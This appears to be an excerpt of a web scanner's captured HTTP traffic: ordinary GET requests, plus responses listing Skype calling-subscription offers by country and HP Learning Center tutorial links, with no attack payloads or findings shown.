<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Skype - ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-dz-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Algeria</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-ar-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Argentina</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-au-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Australia</a> ...[SNIP]... <li>400 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-br-400&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Brazil</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-cm-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Cameroon</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-cl-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Chile</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-dk-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Denmark</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-fr-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in France</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-de-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Germany</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-gh-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Ghana</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-gr-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Greece</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-hn-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines and mobiles</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-it-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Italy</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-jp-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines and mobiles in Japan</a> ...[SNIP]... <li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-mx-120&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Mexico</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-nl-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in the Netherlands</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-nz-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in New Zealand</a> ...[SNIP]... <li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-ng-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Nigeria</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-py-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Paraguay</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-rs-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Serbia</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-pt-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Portugal</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-sk-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Slovakia</a> ...[SNIP]... <li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-si-120&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Slovenia</a> ...[SNIP]... <li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-za-120&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in South Africa</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-kr-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in South Korea</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-es-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Spain</a> ...[SNIP]... <li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-ch-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Switzerland</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-gb-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in the UK</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-uy-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Uruguay</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-us-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines and mobiles in the USA</a> ...[SNIP]...
GET /en/campaigns_and_promotions/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:01 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 175514 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Skype - ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-dz-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Algeria</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-ar-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Argentina</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-au-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Australia</a> ...[SNIP]... <li>400 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-br-400&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Brazil</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-cm-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Cameroon</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-cl-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Chile</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-dk-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Denmark</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-fr-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in France</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-de-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Germany</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-gh-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Ghana</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-gr-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Greece</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-hn-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines and mobiles</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-it-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Italy</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-jp-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines and mobiles in Japan</a> ...[SNIP]... <li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-mx-120&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Mexico</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-nl-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in the Netherlands</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-nz-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in New Zealand</a> ...[SNIP]... <li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-ng-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Nigeria</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-py-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Paraguay</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-rs-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Serbia</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-pt-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Portugal</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-sk-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Slovakia</a> ...[SNIP]... <li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-si-120&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Slovenia</a> ...[SNIP]... <li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-za-120&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in South Africa</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-kr-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in South Korea</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-es-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Spain</a> ...[SNIP]... <li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-ch-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Switzerland</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-gb-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in the UK</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-uy-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Uruguay</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-us-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines and mobiles in the USA</a> ...[SNIP]...
GET /en/subscriptions/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:19 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 107961 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Skype - ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-dz-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Algeria</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-ar-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Argentina</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-au-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Australia</a> ...[SNIP]... <li>400 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-br-400&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Brazil</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-cm-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Cameroon</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-cl-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Chile</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-dk-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Denmark</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-fr-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in France</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-de-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Germany</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-gh-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Ghana</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-gr-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Greece</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-hn-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines and mobiles</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-it-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Italy</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-jp-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines and mobiles in Japan</a> ...[SNIP]... <li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-mx-120&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Mexico</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-nl-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in the Netherlands</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-nz-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in New Zealand</a> ...[SNIP]... <li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-ng-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Nigeria</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-py-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Paraguay</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-rs-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Serbia</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-pt-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Portugal</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-sk-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Slovakia</a> ...[SNIP]... <li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-si-120&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Slovenia</a> ...[SNIP]... <li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-za-120&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in South Africa</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-kr-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in South Korea</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-es-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Spain</a> ...[SNIP]... <li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-ch-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Switzerland</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-gb-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in the UK</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-uy-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Uruguay</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-us-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines and mobiles in the USA</a> ...[SNIP]...
GET /campus/p/campusId/10640/Graphic_arts.htm HTTP/1.1 Host: h30187.www3.hp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /howto_QL_courses.jsp?contentType=How-to+in+2&mcid=explore-create HTTP/1.1 Host: h30187.www3.hp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP Learning center ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/19629/Color_your_business_.htm?courseSessionId=173976&campusId=11262" title="Learn how development of the right color scheme for your marketing collateral can take your business to the next level.">Color your business: develop a marketing color scheme</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/18330/Mastering_email_keep_your_inbox_clutter_free.htm?courseSessionId=175486&campusId=11262" title="Learn how to organize email files and folder structure and use your program's search functionality to achieve better inbox management.">Mastering email: keep your inbox clutter-free</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/14760/Microsoft_Excel_2007.htm?courseSessionId=173985&campusId=11262" title="This animated demonstration introduces you to the new Microsoft Excel 2007 interface, which is very different from earlier versions.">Microsoft.. Excel 2007: take a tour of the interface and learn basic skills</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/14168/Microsoft_Windows_Vi.htm?courseSessionId=173997&campusId=11262" title="This animated demonstration shows you how to find files using basic Search in Windows Vista.">Microsoft.. Windows Vista: find files using basic Search</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/14763/Microsoft_Word_2007_take_a_tour_of_the_Ribbon.htm?courseSessionId=174000&campusId=11262" title="This animated demonstration shows you how to use the Ribbon, the new, tabbed navigation system in Microsoft Word 2007.">Microsoft.. Word 2007: take a tour of the Ribbon</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/14167/Microsoft_Excel_2007_create_a_PivotTable.htm?courseSessionId=173981&campusId=11263" title="This step-by-step demonstration shows you how to summarize a large amount of data to glean some meaning from it using PivotTables in Microsoft Excel 2007.">Microsoft.. Excel 2007: create a PivotTable</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/14171/Microsoft_Excel_2007_filter_data.htm?courseSessionId=173982&campusId=11263" title="This animated demonstration shows you how to filter data in Microsoft Excel 2007. ">Microsoft.. Excel 2007: filter data</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/14170/Microsoft_Excel_2007.htm?courseSessionId=173983&campusId=11263" title="This animated demonstration shows you how to link and unlink information between Microsoft Excel workbooks.">Microsoft.. Excel 2007: link and unlink content between two workbooks</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/35909/Microsoft_Excel_2007.htm?courseSessionId=173977&campusId=11263" title="Formatting can make a chart come to life with colors, patterns and effects. This demonstration teaches you to manually format parts of a chart.">Microsoft.. Excel 2007: manually format parts of a chart</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/14169/Microsoft_Excel_2007.htm?courseSessionId=173984&campusId=11263" title="This animated demonstration shows you how to record a simple macro in Excel and edit it in VBA.">Microsoft.. Excel 2007: record a simple macro and edit it in VBA</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/14760/Microsoft_Excel_2007.htm?courseSessionId=173985&campusId=11263" title="This animated demonstration introduces you to the new Microsoft Excel 2007 interface, which is very different from earlier versions.">Microsoft.. Excel 2007: take a tour of the interface and learn basic skills</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/40441/Microsoft_Excel_2010_creating_PivotTables.htm?courseSessionId=368865&campusId=11263" title="This step-by-step demonstration shows you how to summarize a large amount of data to glean some meaning from it using PivotTables in Microsoft Excel 2010.">Microsoft.. Excel 2010: creating PivotTables</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/40440/Microsoft_Excel_2010.htm?courseSessionId=368864&campusId=11263" title="This animated demonstration shows you how to link and unlink information between Microsoft Excel 2010 workbooks.">Microsoft.. Excel 2010: linking and unlinking Excel workbooks</a> ...[SNIP]... <td align="left" valign="top" width="540">
